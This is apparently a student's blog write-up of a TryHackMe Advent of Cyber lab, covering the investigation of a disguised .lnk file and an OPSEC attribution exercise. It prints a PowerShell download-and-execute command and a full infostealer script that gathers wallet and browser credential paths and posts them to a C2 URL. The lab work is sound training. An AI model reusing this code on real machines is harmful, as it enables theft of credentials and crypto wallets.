Happy December 1st! Being today is the first of the month it also means today is the first day of TryHackMe’s holiday event, Advent of Cyber! To go along with the holiday season and this event of daily challenges, I’m going to try my best to complete the new challenge each day, and some days I might post writeup here, like I am today. This won’t be a daily thing as each days challenge is very long, and I am fastly approaching finals week but I’ll post here when possible. Lets get into the first one!
What is Advent of Cyber?
Advent of Cyber is a holiday event hosted by TryHackMe. Each day in December leading up to Christmas, there is a new festive themed exercise released. It’s a free challenge available to all TryHackMe users, and is beginner friendly. The more questions you complete the higher the chance you have to win prizes.
Day 1: Maybe SOC-mas music, he thought, doesn't come from a store?
The learning objectives of todays challenge include:
Learning how to investigate malicious link files
Learning about OPSEC and OPSEC mistakes
Understanding how to track and attribute digital identities in cyber investigations
Once you have started the machine, visit the website with the machines IP in your web browser. It’s a YouTube to MP3 converter website, three important things to watch out for when using websites like these are malvertising, phishing scams, and bundled malware. Hopefully you are completing this challenge on a virtualized environment instead of your host machine.
To investigate this website some more, throw a link into the input box, hit convert, then either MP3 or MP4, and lastly hit download. Doesn’t matter what link you use along as it’s a valid YouTube link, for example you could use something like https://www.youtube.com/watch?v=dQw4w9WgXcQ. Once downloaded, find the zip folder in your Downloads folder and extract the files, you should should see two files, song.mp3 and somg.mp3. Running the command ‘file [filename]’ will reveal some info about the specified file.
As you can see, there is quite a big difference between the two files, song.mp3 is an MP3 file but somg.MP3 is actually a “MS Windows shortcut” or a .lnk file. To inspect this file some more we’re going to use the command ‘exiftool somg.mp3’, which will print out quite a bit of info including a PowerShell command.
The command, -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\ProgramData\s.ps1'); iex (Get-Content 'C:\ProgramData\s.ps1' -Raw)", does the following:
“-ep Bypass -nop”: disables usual PowerShell restrictions, allowing scripts to run without being stopped by security settings or user profiles
“DownloadFile”: pulls a file from a remote server and saves it in a specified directory on the target machine, in this case the file is a PowerShell script, “IS.ps1”, from what looks to be a GitHub download link
“iex”: executes the downloaded script with PowerShell
The contents of the file that would be downloaded:
function Print-AsciiArt {
Write-Host " ____ _ ___ _____ ___ _ _ "
Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
Write-Host "| | _ | | | | | | | | | |_| |"
Write-Host "| |_| | | |___ | | | | | |__ | _ |"
Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
Write-Host " Created by the one and only M.M."
}
# Call the function to print the ASCII art
Print-AsciiArt
# Path for the info file
$infoFilePath = "stolen_info.txt"
# Function to search for wallet files
function Search-ForWallets {
$walletPaths = @(
"$env:USERPROFILE\.bitcoin\wallet.dat",
"$env:USERPROFILE\.ethereum\keystore\*",
"$env:USERPROFILE\.monero\wallet",
"$env:USERPROFILE\.dogecoin\wallet.dat"
)
Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
foreach ($path in $walletPaths) {
if (Test-Path $path) {
Add-Content -Path $infoFilePath -Value "Found wallet: $path"
}
}
}
# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
$firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"
Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
if (Test-Path $chromePath) {
Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
}
if (Test-Path $firefoxPath) {
Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
}
}
# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
$c2Url = "http://papash3ll.thm/data"
$data = Get-Content -Path $infoFilePath -Raw
# Using Invoke-WebRequest to send data to the C2 server
Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}
# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server
AGAIN, DO NOT EXECUTE THIS CODE ON A WINDOWS HOST MACHINE, A REMINDER TO COMPLETE THIS CHALLENGE ON A VIRTUALIZED ENVIRONMENT.
To continue the investigation for this challenge we are using the PowerShell script from above, some info is revealed in the line “Created by the one and only M.M”. Searching this line in GitHub reveals a post in the Issue section mentioning stuff very similar to the above and posted by a user, MM-WarevilleTHM.
Clicking into it and scrolling down will reveal the above script, as well as some identifiable information pointing back to the user that is most likely behind all of this, revealing the identity of MM. This is a classic case of OPSEC failure.
Operational Security (OPSEC) is a term originally coined by the military to refer to the process of protecting sensitive info and operations from adversaries. The goal is to find and remove any possible vulnerabilities before the attacker has the chance to learn their identity. In cybersecurity, if an attacker doesn’t properly follow OPSEC policies like reusing usernames, email addresses, or account handles, using identifiable metadata in code, documents, or images, posting publicly online, or failing to use a VPN or proxy, it could leave digital traces. Some real world examples include the takedown of the AlphaBay admin, Alexandre Cazes, or law enforcement being able to publicly identify members of the Chinese military hacking group, APT1.
Questions
Question 1: Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?
Look for “Artist” after running the command to to find the author.
Question 2: The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?
Looking in the script for the function that mentions sending info to the C2 server will reveal the URL of the server.
Question 3: Who is M.M? Maybe his Github profile page would provide clues?
Clicking on the GitHub profile there are two popular repos, one is named “M.M”, clicking into it shows a README.md file that shares a little bit about the user and some more info.
Question 4: What is the number of commits on the GitHub repo where the issue was raised?
The other repo on this profile includes the PowerShell script, look around there for the flag.
Question 5: If you enjoyed this task, feel free to check out the OPSEC room!
Question 6: What's with all these GitHub repos? Could they hide something else?
Conclusion
Very quick and easy first challenge to start off this year. This is the first time I’m taking part in this challenge as I wasn’t really a big TryHackMe user till this past summer while off from school. I’m looking forward to the festive challenges and can’t wait to see what else this years challenge brings us!